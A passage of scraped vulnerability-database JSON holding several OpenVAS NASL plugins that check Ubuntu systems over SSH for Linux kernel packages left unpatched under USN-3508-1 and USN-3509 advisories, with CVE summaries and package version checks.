"bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843397", "title": "Ubuntu Update for linux USN-3508-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3508-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843397\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:49 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3508-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Yonggang Guo discovered that a race condition existed in the\n driver subsystem in the Linux kernel. A local attacker could use this to\n possibly gain administrative privileges. (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1023-raspi2\", ver:\"4.10.0-1023.26\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1023.24\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843402", "title": "Ubuntu Update for linux USN-3509-3", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843402\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:32 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. Unfortunately, it also introduced a\n regression that prevented the Ceph network filesystem from being used. This\n update fixes the problem. We apologize for the inconvenience. Original advisory\n details: Mohamed Ghannam discovered that a use-after-free vulnerability existed\n in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use\n this to cause a denial of service (system crash) or possibly execute arbitrary\n code. (CVE-2017-16939) It was discovered that the Linux kernel did not properly\n handle copy-on- write of transparent huge pages. A local attacker could use this\n to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1013-kvm\", ver:\"4.4.0-1013.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1044-aws\", ver:\"4.4.0-1044.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1080-raspi2\", ver:\"4.4.0-1080.88\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1044.46\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1013.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1080.80\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843403", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843403", "title": "Ubuntu Update for linux-lts-xenial USN-3509-4", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_4.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3509-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843403\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:42 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3509-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-2 fixed vulnerabilities in the\n Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also\n introduced a regression that prevented the Ceph network filesystem from being\n used. This update fixes the problem. We apologize for the inconvenience.\n Original advisory details: Mohamed Ghannam discovered that a use-after-free\n vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A\n local attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code. (CVE-2017-16939) It was discovered that the\n Linux kernel did not properly handle copy-on- write of transparent huge pages. A\n local attacker could use this to cause a denial of service (application crashes)\n or possibly gain administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran\n Qiu, and Shixiong Zhao discovered that the associative array implementation in\n the Linux kernel sometimes did not properly handle adding a new entry. A local\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-12193) Andrey Konovalov discovered an out-of-bounds read in the GTCO\n digitizer USB driver for the Linux kernel. A physically proximate attacker could\n use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1006-aws\", ver:\"4.4.0-1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843398", "title": "Ubuntu Update for linux USN-3509-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843398\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:55 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong Zhao discovered that the\n associative array implementation in the Linux kernel sometimes did not properly\n handle adding a new entry. A local attacker could use this to cause a denial of\n service (system crash). (CVE-2017-12193) Andrey Konovalov discovered an\n out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A\n physically proximate attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1012-kvm\", ver:\"4.4.0-1012.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1043-aws\", ver:\"4.4.0-1043.52\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1079-raspi2\", ver:\"4.4.0-1079.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1081-snapdragon\", ver:\"4.4.0-1081.86\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1043.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1012.12\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 